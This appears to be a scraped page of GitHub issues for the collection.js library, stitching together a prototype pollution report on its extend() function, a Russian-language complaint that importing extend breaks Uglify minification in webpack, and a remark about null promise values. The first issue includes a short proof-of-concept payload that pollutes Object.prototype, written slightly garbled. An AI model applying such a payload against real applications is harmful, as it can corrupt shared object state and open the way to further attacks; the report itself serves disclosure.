kobezzza / collection Goto Github PK

Hi,i found the prototype pollution when use the function extend().
The extend function at line 319 in file Collection.js/dist/node/iterators/extend js passes obj the inner value of args, whose stereotype contains the test attribute
the POC is :
var collection = require("collection.js")
bad_payload = JSON.parse('{"proto":{"polluted":"yes"}}');
collection.extend(true,{},bad_payload)
console.log("result:"+ {}.polluted)
the risk line is here:

Использовал пока только 1 функцию из библиотеки

import { extend } from 'collection.js';

Эта строчка ломает продакшн сборку. Код не минифается. Без строчки - минифается.

Вебпак. Минифай обычный Uglify плагином

null в значении промиса должен прерывать операцию.